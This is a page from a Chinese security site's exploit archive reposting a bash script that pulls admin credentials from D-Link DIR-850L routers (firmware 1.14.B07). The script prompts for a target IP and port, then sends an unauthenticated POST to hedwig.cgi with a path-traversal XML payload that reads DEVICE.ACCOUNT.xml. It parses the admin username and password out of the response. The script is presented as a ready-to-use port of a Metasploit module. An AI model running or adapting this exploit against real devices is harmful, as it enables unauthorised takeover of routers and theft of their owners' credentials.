首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR-850L Credential Disclosure
来源:https://blogs.securiteam.com 作者:Zdenda 发布时间:2017-11-27  
#!/bin/bash
#
# Derped together by Raphael de la Vienne A.K.A. Hackdwerg
# Original exploit https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec
# Just in case if you dont have metasploit, or are to lazy to install it. here is a bash variant.
#
# Exploit Title: dlink-850-admin-creds-retriever.sh
# Google Dork: none
# Date: 2017-11-23
# Exploit Author: Zdenda, Peter Geissler, Pierre Kim
# Ported to bash for the ease of use. 
# Vendor Homepage: http://support.dlink.com/ProductInfo.aspx?m=DIR-850L
# Software Link: ftp://ftp2.dlink.com/PRODUCTS/DIR-850L/REVA/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP
# Version: 1.14.B07
# Tested on: mips
# SSV ID:SSV-96333
# CVE : none
# Original PoC: https://www.seebug.org/vuldb/ssvid-96333
# MSF module: https://www.rapid7.com/db/modules/exploit/linux/http/dlink_dir850l_unauth_exec

# Vulnerability found in Hack2Win competition at securiteam
# URL: https://blogs.securiteam.com/index.php/archives/3364
# Credits go to Zdenda, Peter Geissler and Pierre Kim
# Recreated in bash by Hackdwerg
# Usage: enter ip when prompted, enter port when prompted. 

#input IP
echo -e "Enter DLINK IP"
read IP
#input PORT
echo -e "Enter PORT number"
read PORT
#generate Random UID cookie
SET_COOKIE=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)
#setting headers
        HEADER1="User-Agent:Mozilla/4.0 (compatible; MSIE 5.5;Windows NT)"
        HEADER2="Content-Type:text/xml"
        HEADER3="Accept-Encoding:gzip, deflate"
        HEADER4="Cookie:uid=$SET_COOKIE"
        HEADER5="Connection:close"
#Build XML
XML_DATA="<?xml version='1.0' encoding='utf-8'?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>"
#Create POST with variables
POST=$(curl -s -X POST http://$IP:$PORT/hedwig.cgi -H "$HEADER1" -H "$HEADER2" -H "$HEADER3" -H "$HEADER4" -H "$HEADER5" -H "text/xml" -d "$XML_DATA")
OUT_RAW=$(echo $POST > Dlink-$IP-RAW.xml)
echo "output saved in: Dlink-$IP-RAW.xml"
#lazy solution for getting name and password. (if it works it aint stupid)
PRETTYFAIUSER=$(cat Dlink-$IP-RAW.xml | sed -e 's,.*<name>\([^<]*\)</name>.*,\1,g')
PRETTYFAIPASS=$(cat Dlink-$IP-RAW.xml | sed -e 's,.*<password>\([^<]*\)</password>.*,\1,g')

echo "Username =" $PRETTYFAIUSER
echo "Password =" $PRETTYFAIPASS
echo ""
echo "kthankxbye"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WebKit - 'WebCore::FormSubmiss
·Microsoft Edge Chakra JIT Bail
·WebKit - 'WebCore::RenderObjec
·Microsoft Edge Chakra JIT Glob
·WebKit - 'WebCore::DocumentLoa
·Microsoft Edge Chakra JIT Inli
·WebKit - 'WebCore::Style::Tree
·Microsoft Edge Chakra JIT Inco
·WebKit - 'WebCore::SVGPatternE
·Linux - 'mincore()' Uninitiali
·WebKit - 'WebCore::SimpleLineL
·ALLPlayer 7.5 - Local Buffer O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved